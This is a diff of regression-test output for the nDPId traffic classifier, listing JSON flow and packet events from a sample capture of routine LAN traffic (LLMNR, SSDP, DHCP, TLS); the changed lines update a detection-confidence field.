-00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":827,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104399959,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":827,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399959,"flow_last_seen":1470104399959,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104399959,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":62756,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":831,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1470104400059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1470104400059,"pkt":"AQBeAAD8GF4PUugBCABFAAA2MRIAAAER4cfAqAU54AAA\/P5+FOsAIr4lNLsAAAABAAAAAAAACFVzaGVyLVBDAAD\/AAE="} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":832,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1470104400059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1470104400059,"pkt":"AQBeAAD8bEAIlAI6CABFAAA4rMMAAAERZh3AqAUw4AAA\/OmVFOsAJO3eTL0AAAABAAAAAAAACkthc3Blci1tYWMAAP8AAQ=="} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":200000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":0,"thread_ts_msec":1470104400162,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01137{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1470104400162,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":562,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":562,"pkt_l4_len":528,"thread_ts_msec":1470104400162,"pkt":"AQBef\/\/66LH8q\/uyCABFAAIkCfEAAAQR9QTAqAUx7\/\/\/+gdsB2wCELIPTk9USUZZICogSFRUUC8xLjENCkhvc3Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpOVDogdXJuOm1pY3Jvc29mdC5jb206c2VydmljZTpYX01TX01lZGlhUmVjZWl2ZXJSZWdpc3RyYXI6MQ0KTlRTOiBzc2RwOmFsaXZlDQpMb2NhdGlvbjogaHR0cDovLzE5Mi4xNjguNS40OToyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6OTMxOTM5NWEtNGQwMy00NzUwLWJiMWItNDY2MzkzM2FiODEyDQpVU046IHV1aWQ6OTMxOTM5NWEtNGQwMy00NzUwLWJiMWItNDY2MzkzM2FiODEyOjp1cm46bWljcm9zb2Z0LmNvbTpzZXJ2aWNlOlhfTVNfTWVkaWFSZWNlaXZlclJlZ2lzdHJhcjoxDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTkwMA0KU2VydmVyOiBNaWNyb3NvZnQtV2luZG93cy8xMC4wIFVQblAvMS4wIFVQblAtRGV2aWNlLUhvc3QvMS4wDQpPUFQ6Imh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7IG5zPTAxDQowMS1OTFM6IGQwN2I0MzVkMjk5YjQxNzg0Y2EzZDJhZTJiOTU5OTQ4DQoNCg=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":200000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":0,"thread_ts_msec":1470104400162,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":834,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":200000,"flow_min_l4_payload_len":520,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":520,"flow_avg_l4_payload_len":520,"midstream":0,"thread_ts_msec":1470104400162,"l3_proto":"ip4","src_ip":"192.168.5.49","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":200000,"flow_min_l4_payload_len":528,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1470104400162,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01172{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1470104400162,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":590,"pkt_l4_len":536,"thread_ts_msec":1470104400162,"pkt":"MzMAAAAM6LH8q\/uyht1gAAAAAhgRBP6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAAAMB2wHbAIYYQNOT1RJRlkgKiBIVFRQLzEuMQ0KSG9zdDogW0ZGMDI6OkNdOjE5MDANCk5UOiB1cm46bWljcm9zb2Z0LmNvbTpzZXJ2aWNlOlhfTVNfTWVkaWFSZWNlaXZlclJlZ2lzdHJhcjoxDQpOVFM6IHNzZHA6YWxpdmUNCkxvY2F0aW9uOiBodHRwOi8vW2ZlODA6OjliZDo4MWRkOjJmZGM6NTc1MF06Mjg2OS91cG5waG9zdC91ZGhpc2FwaS5kbGw\/Y29udGVudD11dWlkOjkzMTkzOTVhLTRkMDMtNDc1MC1iYjFiLTQ2NjM5MzNhYjgxMg0KVVNOOiB1dWlkOjkzMTkzOTVhLTRkMDMtNDc1MC1iYjFiLTQ2NjM5MzNhYjgxMjo6dXJuOm1pY3Jvc29mdC5jb206c2VydmljZTpYX01TX01lZGlhUmVjZWl2ZXJSZWdpc3RyYXI6MQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT05MDANClNlcnZlcjogTWljcm9zb2Z0LVdpbmRvd3MvMTAuMCBVUG5QLzEuMCBVUG5QLURldmljZS1Ib3N0LzEuMA0KT1BUOiJodHRwOi8vc2NoZW1hcy51cG5wLm9yZy91cG5wLzEvMC8iOyBucz0wMQ0KMDEtTkxTOiBkMDdiNDM1ZDI5OWI0MTc4NGNhM2QyYWUyYjk1OTk0OA0KDQo="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":200000,"flow_min_l4_payload_len":528,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1470104400162,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":835,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104400162,"flow_last_seen":1470104400162,"flow_idle_time":200000,"flow_min_l4_payload_len":528,"flow_max_l4_payload_len":528,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":528,"midstream":0,"thread_ts_msec":1470104400162,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::c","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":839,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1470104400366,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1470104400366,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S7cAAAERxybAqAUy4AAA\/PUkFOsAJRvtK70AAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="} 01117{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1470104400366,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":548,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":548,"pkt_l4_len":514,"thread_ts_msec":1470104400366,"pkt":"AQBef\/\/66LH8q\/uyCABFAAIWCfIAAAQR9RHAqAUx7\/\/\/+gdsB2wCAmnTTk9USUZZICogSFRUUC8xLjENCkhvc3Q6IDIzOS4yNTUuMjU1LjI1MDoxOTAwDQpOVDogdXJuOnNjaGVtYXMtdXBucC1vcmc6c2VydmljZTpDb25uZWN0aW9uTWFuYWdlcjoxDQpOVFM6IHNzZHA6YWxpdmUNCkxvY2F0aW9uOiBodHRwOi8vMTkyLjE2OC41LjQ5OjI4NjkvdXBucGhvc3QvdWRoaXNhcGkuZGxsP2NvbnRlbnQ9dXVpZDo5MzE5Mzk1YS00ZDAzLTQ3NTAtYmIxYi00NjYzOTMzYWI4MTINClVTTjogdXVpZDo5MzE5Mzk1YS00ZDAzLTQ3NTAtYmIxYi00NjYzOTMzYWI4MTI6OnVybjpzY2hlbWFzLXVwbnAtb3JnOnNlcnZpY2U6Q29ubmVjdGlvbk1hbmFnZXI6MQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT05MDANClNlcnZlcjogTWljcm9zb2Z0LVdpbmRvd3MvMTAuMCBVUG5QLzEuMCBVUG5QLURldmljZS1Ib3N0LzEuMA0KT1BUOiJodHRwOi8vc2NoZW1hcy51cG5wLm9yZy91cG5wLzEvMC8iOyBucz0wMQ0KMDEtTkxTOiBkMDdiNDM1ZDI5OWI0MTc4NGNhM2QyYWUyYjk1OTk0OA0KDQo="} 01151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":841,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1470104400366,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":576,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":576,"pkt_l4_len":522,"thread_ts_msec":1470104400366,"pkt":"MzMAAAAM6LH8q\/uyht1gAAAAAgoRBP6AAAAAAAAACb2B3S\/cV1D\/AgAAAAAAAAAAAAAAAAAMB2wHbAIKzRJOT1RJRlkgKiBIVFRQLzEuMQ0KSG9zdDogW0ZGMDI6OkNdOjE5MDANCk5UOiB1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOkNvbm5lY3Rpb25NYW5hZ2VyOjENCk5UUzogc3NkcDphbGl2ZQ0KTG9jYXRpb246IGh0dHA6Ly9bZmU4MDo6OWJkOjgxZGQ6MmZkYzo1NzUwXToyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6OTMxOTM5NWEtNGQwMy00NzUwLWJiMWItNDY2MzkzM2FiODEyDQpVU046IHV1aWQ6OTMxOTM5NWEtNGQwMy00NzUwLWJiMWItNDY2MzkzM2FiODEyOjp1cm46c2NoZW1hcy11cG5wLW9yZzpzZXJ2aWNlOkNvbm5lY3Rpb25NYW5hZ2VyOjENCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9OTAwDQpTZXJ2ZXI6IE1pY3Jvc29mdC1XaW5kb3dzLzEwLjAgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzogZDA3YjQzNWQyOTliNDE3ODRjYTNkMmFlMmI5NTk5NDgNCg0K"} @@ -358,7 +358,7 @@ 00876{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":848,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1470104400983,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":359,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":359,"pkt_l4_len":325,"thread_ts_msec":1470104400983,"pkt":"\/\/\/\/\/\/\/\/XNmY3fXzCABFAAFZAABAAEARbn7AqApu\/\/\/\/\/+xA9gABRTgx\/\/8AAKAAXNmY3fXzwKgKbgAAAgAnAUROUy0xMTAwLTA0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABOQVMAAAAAAAAAAAAAVVqvihgAAABVWsE9WwAAAFVasDEuMDJiMTAAEXgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXNmY3fXzM0ExAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRsaW5rLURERjVGMwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAqApu\/\/8AAExBTjEAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104401187,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1470104401187,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1470104401187,"pkt":"AQBeAAD8uKxv2MGbCABFAAA5S70AAAERxyDAqAUy4AAA\/MNuFOsAJYAi+T0AAAABAAAAAAAAC2NoYXJtaW5nLVBDAAD\/AAE="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104401187,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":851,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401187,"flow_last_seen":1470104401187,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1470104401187,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"224.0.0.252","src_port":50030,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1470104401902,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1470104401902,"pkt":"\/\/\/\/\/\/\/\/vO57DLPeCABFAAFIg+0AAEAR9bgAAAAA\/\/\/\/\/wBEAEMBNDMlAQEGANPiBnoAAAAAAAAAAAAAAAAAAAAAAAAAALzuewyz3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBOQIF3DwMZGhjcGNkLTUuNS42DBhhbmRyb2lkLWY3Y2EwZjU3MTI3MGM1MmQ3CQEhAwYPHDM6O\/8A"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":862,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104401904,"flow_last_seen":1470104401904,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1470104401904,"l3_proto":"ip4","src_ip":"59.120.208.212","dst_ip":"255.255.255.255","src_port":32768,"dst_port":1947,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":862,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1470104401904,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1470104401904,"pkt":"\/\/\/\/\/\/\/\/ABNyFooyCABFAABEAABAAEARLl07eNDU\/\/\/\/\/4AAB5sAMADiZERZY1RjNFBBQUJQY0dWdVluUnpBSFZ0Ukc5c2IzSlRhWFJCYldVQQ=="} @@ -366,56 +366,56 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":872,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1470104402238,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104402238,"pkt":"ABAj4ACgYMVHBbyMCABFAABAGihAAEAGJuTAqAUQwKhzS9F5AbtwBJ91AAAAALAC\/\/\/WVQAAAgQFtAEDAwUBAQgKGg9qPQAAAAAEAgAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":873,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1470104402239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104402239,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XnKmfzXcASfdoASFtC0YwAAAgQFtAEBBAIBAwMH"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":3,"flow_last_seen":1470104402239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104402239,"pkt":"ABAj4ACgYMVHBbyMCABFAAAosclAAEAGj1rAqAUQwKhzS9F5AbtwBJ92ypn82FAQIADsBQAAyQ4pxaWW"} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104402238,"flow_last_seen":1470104402240,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104402240,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":877,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104402238,"flow_last_seen":1470104402243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104402243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":875,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104402238,"flow_last_seen":1470104402240,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1470104402240,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01095{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":877,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104402238,"flow_last_seen":1470104402243,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":374,"flow_avg_l4_payload_len":62,"midstream":0,"thread_ts_msec":1470104402243,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"618ee2509ef52bf0b8216e1564eea909","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":200000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104402518,"l3_proto":"ip4","src_ip":"192.168.119.1","dst_ip":"255.255.255.255","src_port":56861,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1470104402518,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":177,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":177,"pkt_l4_len":143,"thread_ts_msec":1470104402518,"pkt":"\/\/\/\/\/\/\/\/TF4M6gNlCABFAACjAABAAEARAqHAqHcB\/\/\/\/\/94dFi4Aj\/bjAAFSEAABAAZMXgzqA2UABQAHMzAwTU5BVAAHAA82LjM1LjEgKHN0YWJsZSkACAAITWlrcm9UaWsACgAEf5YkAAALAAlBWFJKLVg2U0cADAAGUkI0NTBHAA4AAQEADwAQIAGwMAIUAQAAAAAAAAAAAQAQABNldGhlcjItbWFzdGVyLWxvY2Fs"} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":888,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104402518,"flow_last_seen":1470104402518,"flow_idle_time":200000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":0,"thread_ts_msec":1470104402518,"l3_proto":"ip6","src_ip":"fe80::4e5e:cff:feea:365","dst_ip":"ff02::1","src_port":5678,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 